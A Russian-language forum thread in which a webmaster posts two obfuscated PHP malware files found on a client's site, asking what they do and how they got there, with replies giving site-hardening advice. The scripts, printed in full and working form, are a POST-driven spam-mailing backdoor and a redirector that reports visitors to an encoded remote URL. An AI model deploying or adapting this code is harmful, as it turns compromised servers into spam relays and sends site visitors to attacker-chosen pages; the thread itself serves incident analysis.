Меню
Что нового?

Троян PHP/Agent.BV , исходник

erobober

erobober

Новичок
Привет! Клиент сообщил, что сайт странно работает. Сначала думал, что напартачили с .htaccess. Но нашел вот такой файлик. Сам ещё разбираюсь, из внятного нашел только ссылка. Ищу: что он делает, мог ли он(последствия выполнения) изменить .htaccess, как мог попасть, чем производили обфускацию кода скрипта.

returnJ8a9.php
PHP: 
<?php
@error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
if (count($_POST) < 2) {
    die(PHP_OS . chr(49) . chr(48) . chr(43) . md5(0987654321));
}
$v5031e998 = false;
foreach (array_keys($_POST) as $v3c6e0b8a) {
    switch ($v3c6e0b8a[0]) {
        case chr(108):
            $vd56b6998 = $v3c6e0b8a;
            break;
        case chr(100):
            $v8d777f38 = $v3c6e0b8a;
            break;
        case chr(109):
            $v3d26b0b1 = $v3c6e0b8a;
            break;
        case chr(101);
            $v5031e998 = true;
            break;
    }
}
if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));
$v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
$v01b6e203 = @$_POST[$vd56b6998];
$v8d777f38 = @$_POST[$v8d777f38];
$v3d26b0b1 = @$_POST[$v3d26b0b1];
if ($v5031e998) {
    $v01b6e203 = n9a2d8ce3($v01b6e203);
    $v8d777f38 = n9a2d8ce3($v8d777f38);
    $v3d26b0b1 = n9a2d8ce3($v3d26b0b1);
}
$v01b6e203 = urldecode(stripslashes($v01b6e203));
$v8d777f38 = urldecode(stripslashes($v8d777f38));
$v3d26b0b1 = urldecode(stripslashes($v3d26b0b1));
if (strpos($v01b6e203, ';', 1) != false) {
    list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/', strtolower($v01b6e203));
    $va3da707b = ucfirst($va3da707b);
    $vbfbb12dc = ucfirst($vbfbb12dc);
    $v3a5939e4 = next(explode('@', $v081bde0c));
    if ($vbfbb12dc == '' || $va3da707b == '') {
        $vbfbb12dc = $va3da707b = '';
        $v01b6e203 = $v081bde0c;
    } else {
        $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>";
    }
} else {
    $vbfbb12dc = $va3da707b = '';
    $v081bde0c = strtolower($v01b6e203);
    $v3a5939e4 = next(explode('@', $v01b6e203));
}
preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1);
$vee11cbb1 = $vee11cbb1[1];
preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c);
$vb068931c = $vb068931c[1];
preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9);
$vc34487c9 = $vc34487c9[1];
preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42);
$v6f4b5f42 = $v6f4b5f42[1];
$vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9);
$vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9);
$v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42);
$v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42);
$v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false;
else $v10497e3f = true;
$v9a5cb5d8 = "$vee11cbb1@$v0897acf4";
if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>";
else $vd98a07f8 = $v9a5cb5d8;
$vb8ddc93f = "From: $vd98a07f8\r\n";
$vb8ddc93f .= "Reply-To: $vd98a07f8\r\n";
$v3c87b187 = "X-Priority: 3 (Normal)\r\n";
$v3c87b187 .= "MIME-Version: 1.0\r\n";
$v3c87b187 .= "Content-Type: text/html;
 charset=\"iso-8859-1\"\r\n";
$v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n";
if (!in_array('mail', $v619d75f8)) {
    if ($v10497e3f) {
        if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f . $v3c87b187, "-f$v9a5cb5d8")) die(chr(79) . chr(75) . md5(1234567890) . "+0");
    } else {
        if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) die(chr(79) . chr(75) . md5(1234567890) . "+0");
    }
}
$v4340fd73 = "Date: " . @date("D, j M Y G:i:s O") . "\r\n" . $vb8ddc93f;
$v4340fd73 .= "Message-ID: <" . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . "@$v0897acf4>\r\n";
$v4340fd73 .= "To: $v01b6e203\r\n";
$v4340fd73 .= "Subject: $vc34487c9\r\n";
$v4340fd73 .= $v3c87b187;
$v841a2d68 = $v4340fd73 . "\r\n" . $v6f4b5f42;
if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4);
if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) {
    die(chr(79) . chr(75) . md5(1234567890) . "+1");
} else {
    echo PHP_OS . chr(50) . chr(48) . '+' . md5(0987654321) . "+$vb4a88417";
}
function ne667da76($v957b527b)
{
    return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b);
}

function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685 = "=\r\n", $v92f21a0f = 0, $v3303c65a = false)
{
    $vf5a8e923 = strlen($vb45cffe0);
    $vb4a88417 = '';
    for ($v865c0c0b = 0;
         $v865c0c0b < $vf5a8e923;
         $v865c0c0b++) {
        if ($v11a95b8a >= 75) {
            $v11a95b8a = $v92f21a0f;
            $vb4a88417 .= $v7fa1b685;
        }
        $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]);
        if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
            if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) {
                $vb4a88417 .= chr($v4a8a08f0);
                $v11a95b8a = 0;
                continue;
            }
            $vb4a88417 .= '=' . str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
            $v11a95b8a += 3;
            continue;
        }
        $vb4a88417 .= chr($v4a8a08f0);
        $v11a95b8a++;
    }
    return $vb4a88417;
}

function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1)
{
    global $v619d75f8;
    if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
    elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1;
    if (!$v66b18866) {
        return 1;
    } else {
        $v8d777f38 = n54070395($v66b18866);
        @fputs($v66b18866, "EHLO $v0897acf4\r\n");
        $ve98d2f00 = n54070395($v66b18866);
        if (substr($ve98d2f00, 0, 3) != 250) return "2+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
        @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n");
        $ve98d2f00 = n54070395($v66b18866);
        if (substr($ve98d2f00, 0, 3) != 250) return "3+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
        @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n");
        $ve98d2f00 = n54070395($v66b18866);
        if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
        @fputs($v66b18866, "DATA\r\n");
        $ve98d2f00 = n54070395($v66b18866);
        if (substr($ve98d2f00, 0, 3) != 354) return "5+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
        @fputs($v66b18866, $v841a2d68 . "\r\n.\r\n");
        $ve98d2f00 = n54070395($v66b18866);
        if (substr($ve98d2f00, 0, 3) != 250) return "6+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
        @fputs($v66b18866, "QUIT\r\n");
        @fclose($v66b18866);
        return 0;
    }
}

function n54070395($v66b18866)
{
    $v8d777f38 = '';
    while ($v341be97d = @fgets($v66b18866, 4096)) {
        $v8d777f38 .= $v341be97d;
        if (substr($v341be97d, 3, 1) == ' ') break;
    }
    return $v8d777f38;
}

function n9c812bad($vad5f82e8)
{
    global $v619d75f8;
    if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) {
        @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816);
        if (count($v744fa43b) === 0) return '127.0.0.1';
        $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816));
        return $v744fa43b[$v865c0c0b[0]];
    } else {
        return '127.0.0.1';
    }
}

function n9a2d8ce3($v1cb251ec)
{
    $v1cb251ec = base64_decode($v1cb251ec);
    $vc68271a6 = '';
    for ($v865c0c0b = 0;
         $v865c0c0b < strlen($v1cb251ec);
         $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2);
    return $vc68271a6;
}

?>
 
erobober

erobober

Новичок
Вот ещё:
PHP: 
<? $GLOBALS['_1721131579_'] = Array(base64_decode('ZGVmaW5l'), base64_decode('c3' . 'RydG9sb3dlcg=' . '='), base64_decode('c3' . 'RycG9z'), base64_decode('c3RycG9z'), base64_decode('c3RydG' . '9sb3dlcg=' . '='), base64_decode('c3RyX3' . 'JlcGxhY2U' . '='), base64_decode('dXJsZW5jb2R' . 'l'), base64_decode('dXJ' . 'sZW5jb2Rl'), base64_decode('c3RydmF' . 's'), base64_decode('' . 'bXR' . 'fcmFuZA=='), base64_decode('aGVhZGV' . 'y'), base64_decode('aW5pX' . '2dl' . 'dA=' . '='), base64_decode('cG' . 'Fyc2Vfd' . 'X' . 'Js'), base64_decode('' . 'Zn' . 'NvY' . '2' . 'tvcGVu'), base64_decode('Z' . 'nV' . 'uY3Rp' . 'b25fZ' . 'Xh' . 'pc3Rz'), base64_decode('c' . '3' . 'RyZWFtX2NvbnRleHRfY' . '3' . 'JlYXRl'), base64_decode('YXJ' . 'yYXlf' . 'ZGlmZ' . 'l91YXN' . 'zb' . '2M' . '='), base64_decode('bXRfc' . 'mF' . 'uZA=' . '='), base64_decode('Zm' . 'ls' . 'ZV9nZ' . 'XRfY' . '29udG' . 'VudH' . 'M='), base64_decode('' . 'c3RydHI' . '='), base64_decode('Y' . '3Vy' . 'bF9jbG9z' . 'ZQ=='), base64_decode('Z' . 'nB1d' . 'HM='), base64_decode('' . 'c' . '3RybG' . 'Vu'), base64_decode('c3Vi' . 'c' . '3' . 'RyX2NvdW5' . '0'), base64_decode('' . 'ZnJlYWQ='), base64_decode('bX' . 'Rfcm' . 'FuZA=='), base64_decode('c3RybmF0Y21' . 'w'), base64_decode('ZmNs' . 'b3N' . 'l'), base64_decode('c3' . 'Ryc' . 'G' . '9z'), base64_decode('' . 'c3' . 'Vi' . 'c3' . 'Ry'), base64_decode('c' . '2hhM' . 'Q=='), base64_decode('Y3VybF9' . 'pbml0'), base64_decode('Y' . '3V' . 'ybF9' . 'zZX' . 'R' . 'vcHQ='), base64_decode('Y3VybF' . '9' . 'zZX' . 'RvcH' . 'Q='), base64_decode('' . 'Y3Vy' . 'bF9zZ' . 'XRvcHQ='), base64_decode('' . 'c' . '2h' . 'hMQ' . '=='), base64_decode('b' . 'XNzc' . 'W' . 'xfcmVzd' . 'Wx0'), base64_decode('Y3' . 'Vy' . 'bF9zZ' . 'XRv' . 'cHQ='), base64_decode('c3' . 'RydG90aW1' . 'l'), base64_decode('bXRfc' . 'mFuZA=='), base64_decode('Y3' . 'Vyb' . 'F' . '9leGVj'), base64_decode('Y3VybF9' . 'jbG9zZQ=='));
?>
<? function _2032585164($i)
{
    $a = Array('QURN' . 'SU5fUkVE' . 'SV' . 'JfV' . 'VJM', 'aHR0c' . 'D' . 'ovL2R' . 'iY' . 'y5' . 'waW5lc3RyeS' . '5jb' . '20vc' . 'n' . 'RrL2' . 'd' . 'ldF91cmwu' . 'c' . 'Ghw', 'SFRUUF9' . 'VU' . '0VS' . 'X' . '0F' . 'H' . 'RU5U', '' . 'SFRUU' . 'F9VU0V' . 'SX' . '0' . 'F' . 'HRU5U', '', 'd' . '2luZG93c' . 'w==', 'MXo=', 'b3Blcm' . 'EvO' . 'S4' . '4MA==', 'bXNp' . 'Z' . 'S' . 'Ax' . 'MA' . '==', 'bX' . 'NpZSA5', 'bXNpZSA4', 'bXN' . 'pZSA3', 'Mno=', 'SFRUUF9' . 'SRUZFUkVS', '' . 'SFRU' . 'UF9SRUZFU' . 'kVS', '', 'M3o=', 'SFR' . 'UUF9IT1N' . 'U', '' . 'S' . 'FRUUF' . '9' . 'IT1NU', 'SFRUUF' . '9IT1NU', 'd3d' . '3L' . 'g==', '', 'S' . 'FRUUF9' . 'IT1NU', 'ZD' . '0=', 'SFRU' . 'UF9I' . 'T1NU', 'Og==', 'UkVNT1R' . 'FX' . '0F' . 'ERFI' . '=', '' . 'Og=' . '=', 'Z' . 'Q==', 'Q' . 'kFE', 'TG9jY' . 'XRpb2' . '4' . '6IA==', 'YWxsb3dfdXJsX2Zv' . 'cGV' . 'u', 'aG9' . 'zdA==', 'aG' . '9z' . 'dA==', '' . 'cGF0aA=' . '=', '' . 'Y' . '3' . 'Vy' . 'b' . 'F9p' . 'bml0', 'aH' . 'R0' . 'cA' . '==', 'b' . 'WV0aG' . '9k', 'UE9T' . 'VA==', 'a' . 'G' . 'VhZGV' . 'y', 'Q' . '2' . '9u' . 'd' . 'G' . 'V' . 'u' . 'dC1UeXBlOiB' . 'hcHB' . 'sa' . 'WNhdGlvbi94' . 'LXd3dy1' . 'mb3J' . 'tLX' . 'Vy' . 'bGVuY29' . 'k' . 'Z' . 'WQ=', 'Cg==', 'Y' . '29udGVudA==', 'U' . 'E' . '9TVC' . 'A=', 'ICBIVF' . 'RQLzEu' . 'MA0K', 'VXNlci1B' . 'Z' . '2' . 'Vud' . 'DogTW96aWx' . 'sYS8' . '1LjAgKFdpb' . 'mRvd3' . 'M' . '7' . 'IFU7IFdpbm' . 'R' . 'vd3MgTl' . 'QgNS4' . 'xOyB' . 'lb' . 'i1' . 'VU' . 'zsgcnY' . '6MS44LjAuMyk' . 'g' . 'R2' . 'V' . 'j' . 'a28vMjAwNj' . 'A0M' . 'j' . 'YgRm' . 'l' . 'yZWZv' . 'eC8xLjUuM' . 'C4zDQo=', '' . 'QW' . 'NjZXB0' . 'OiAqLyoNC' . 'g==', 'Q' . 'WN' . 'jZ' . 'XB0' . 'L' . 'Uxhbm' . 'd1YW' . 'dlOiBlbi11cyxl' . 'bjt' . 'xP' . 'TAuNQ0K', 'QW' . 'NjZ' . 'XB0LUNoYXJ' . 'z' . 'ZX' . 'Q' . '6IElTT' . 'y04' . 'ODU5L' . 'TEsdXRmLT' . 'g7cT0wL' . 'j' . 'csKjtx' . 'PTAuNw' . '0K', 'Q2' . '9udGVudC1MZW5' . 'ndGg6IA' . '==', 'D' . 'Qo=', '', 'DQoNCg==', 'dnN' . 'xd' . 'w==', 'a' . 'n' . 'F4Z' . 'Q==');
    return base64_decode($a[$i]);
}

?>
<?php $GLOBALS['_1721131579_'][0](_2032585164(0), _2032585164(1));
$_0 = isset($_SERVER[_2032585164(2)]) ? $GLOBALS['_1721131579_'][1]($_SERVER[_2032585164(3)]) : _2032585164(4);
if ($GLOBALS['_1721131579_'][2]($_0, _2032585164(5)) === false) {
    exit(_2032585164(6));
}
$_1 = array(_2032585164(7), _2032585164(8), _2032585164(9), _2032585164(10), _2032585164(11),);
$_2 = false;
foreach ($_1 as $_3) {
    if ($GLOBALS['_1721131579_'][3]($_0, $_3) !== false) {
        $_2 = true;
        break;
    }
}
if (!$_2) {
    exit(_2032585164(12));
}
$_4 = isset($_SERVER[_2032585164(13)]) ? $_SERVER[_2032585164(14)] : _2032585164(15);
if (empty($_4)) {
    exit(_2032585164(16));
}
$_SERVER[_2032585164(17)] = $GLOBALS['_1721131579_'][4]($_SERVER[_2032585164(18)]);
$_SERVER[_2032585164(19)] = $GLOBALS['_1721131579_'][5](_2032585164(20), _2032585164(21), $_SERVER[_2032585164(22)]);
$_5 = _2032585164(23) . $GLOBALS['_1721131579_'][6]($_SERVER[_2032585164(24)]) . _2032585164(25) . $GLOBALS['_1721131579_'][7]($_SERVER[_2032585164(26)] . _2032585164(27) . $_4);;
$_6 = _2032585164(28);
$_7 = l__0($_5);
(round(0 + 456) - round(0 + 228 + 228) + round(0 + 552 + 552 + 552) - round(0 + 828 + 828)) ? $GLOBALS['_1721131579_'][8]($_5, $_3, $_8) : $GLOBALS['_1721131579_'][9](round(0 + 456), round(0 + 665.8 + 665.8 + 665.8 + 665.8 + 665.8));
if ($_7 == _2032585164(29)) {
    exit();
}
$GLOBALS['_1721131579_'][10](_2032585164(30) . $_7);
function l__0($_9)
{
    if ($GLOBALS['_1721131579_'][11](_2032585164(31)) == round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)) {
        return l__1($_9);
    } else {
        $_10 = $GLOBALS['_1721131579_'][12](ADMIN_REDIR_URL);
        if ($_11 = @$GLOBALS['_1721131579_'][13]($_10[_2032585164(32)], round(0 + 40 + 40), $_12, $_13, round(0 + 3.75 + 3.75 + 3.75 + 3.75))) {
            return l__2($_11, $_10[_2032585164(33)], $_10[_2032585164(34)], $_9);
        } elseif (@$GLOBALS['_1721131579_'][14](_2032585164(35))) {
            return l__3($_9);
        }
    }
}

function l__1($_5)
{
    $_14 = $GLOBALS['_1721131579_'][15](array(_2032585164(36) => array(_2032585164(37) => _2032585164(38), _2032585164(39) => _2032585164(40) . _2032585164(41), _2032585164(42) => $_5,),));
    (round(0 + 580.66666666667 + 580.66666666667 + 580.66666666667) - round(0 + 348.4 + 348.4 + 348.4 + 348.4 + 348.4) + round(0 + 673.33333333333 + 673.33333333333 + 673.33333333333) - round(0 + 404 + 404 + 404 + 404 + 404)) ? $GLOBALS['_1721131579_'][16]($_4, $_7, $_2) : $GLOBALS['_1721131579_'][17](round(0 + 435.5 + 435.5 + 435.5 + 435.5), round(0 + 4680));
    return $GLOBALS['_1721131579_'][18](ADMIN_REDIR_URL, false, $_14);
    if ((round(0 + 80.5 + 80.5) + round(0 + 2458)) > round(0 + 40.25 + 40.25 + 40.25 + 40.25) || $GLOBALS['_1721131579_'][19]($_15, $_16)) ;
    else {
        $GLOBALS['_1721131579_'][20]($_1);
    }
}

function l__2($_11, $_17, $_15, $_5)
{
    $GLOBALS['_1721131579_'][21]($_11, _2032585164(43) . $_15 . _2032585164(44) . "Host: $_17\r\n" . _2032585164(45) . _2032585164(46) . _2032585164(47) . _2032585164(48) . _2032585164(49) . $GLOBALS['_1721131579_'][22]($_5) . _2032585164(50) . "Content-Type: application/x-www-form-urlencoded\r\n\r\n$_5");
    $_8 = _2032585164(51);
    while (round(0 + 3843) - round(0 + 960.75 + 960.75 + 960.75 + 960.75)) $GLOBALS['_1721131579_'][23]($_14);
    while ($_16 = $GLOBALS['_1721131579_'][24]($_11, round(0 + 819.2 + 819.2 + 819.2 + 819.2 + 819.2))) {
        $_8 .= $_16;
        if (round(0 + 2115.3333333333 + 2115.3333333333 + 2115.3333333333) < $GLOBALS['_1721131579_'][25](round(0 + 365 + 365 + 365 + 365 + 365), round(0 + 1129 + 1129 + 1129 + 1129))) $GLOBALS['_1721131579_'][26]($_11);
    }
    $GLOBALS['_1721131579_'][27]($_11);
    $_18 = $GLOBALS['_1721131579_'][28]($_8, _2032585164(52));
    $_8 = $GLOBALS['_1721131579_'][29]($_8, $_18 + round(0 + 1 + 1 + 1 + 1));
    return $_8;
    while (round(0 + 2376 + 2376) - round(0 + 950.4 + 950.4 + 950.4 + 950.4 + 950.4)) $GLOBALS['_1721131579_'][30]($_1, $_13, $_8);
}

function l__3($_5)
{
    $_19 = $GLOBALS['_1721131579_'][31](ADMIN_REDIR_URL);
    $GLOBALS['_1721131579_'][32]($_19, 42, FALSE);
    $_20 = _2032585164(53);
    $GLOBALS['_1721131579_'][33]($_19, 19913, TRUE);
    $GLOBALS['_1721131579_'][34]($_19, 13, round(0 + 3.75 + 3.75 + 3.75 + 3.75));
    if ((round(0 + 333.2 + 333.2 + 333.2 + 333.2 + 333.2) + round(0 + 875.8 + 875.8 + 875.8 + 875.8 + 875.8)) > round(0 + 833 + 833) || $GLOBALS['_1721131579_'][35]($_21, $_17, $_1, $_13, $_14)) ;
    else {
        $GLOBALS['_1721131579_'][36]($_19);
    }
    $GLOBALS['_1721131579_'][37]($_19, 10015, $_5);
    (round(0 + 302.25 + 302.25 + 302.25 + 302.25) - round(0 + 1209) + round(0 + 896.5 + 896.5 + 896.5 + 896.5) - round(0 + 1793 + 1793)) ? $GLOBALS['_1721131579_'][38]($_4, $_10) : $GLOBALS['_1721131579_'][39](round(0 + 1209), round(0 + 4765));
    $_21 = $GLOBALS['_1721131579_'][40]($_19);
    $GLOBALS['_1721131579_'][41]($_19);
    $_22 = _2032585164(54);
    return $_21;
}
Жаль система не моя, знал бы где искать.
 

stopkran

Дилетант
erobober написал(а):
, как мог попасть,
Нажмите для раскрытия...
Видимо, взломали админку сайта.

С одного хостинга пришло недавно предупреждение о массированной атаке (подбор паролей к админке) на известные движки (джумла, WP). Предлагается (временно) сменить путь к авторизации в админке.
 
Macintosh

Macintosh

Новичок
Лучше вообще, делать админку, закрытой для внешнего мира, если конечно есть такая возможность. Доступ только со своего IP адреса.
 
Macintosh

Macintosh

Новичок
Ну, я ведь сказал, если есть такая возможность, у меня просто свой сервак дома, и постоянный выделенный IP. К серверу и сайтам доступ я получаю только из своей квартиры, если мне нужно получать доступ удаленно, я на время просто подправляю конфиг сервера на Allow from all. Но как правило мне этого делать не приходится.
 
Breeze

Breeze

goshogun
Команда форума
Партнер клуба
надо держать одну единственную папку в докруте, доступную на запись юзеру веб-сервера. и чтобы в ней пехапе был выключен.
а то понаделают хрени с доступным на запись докрутом, а потом жалуются.
 
Войдите или зарегистрируйтесь для ответа.
Сверху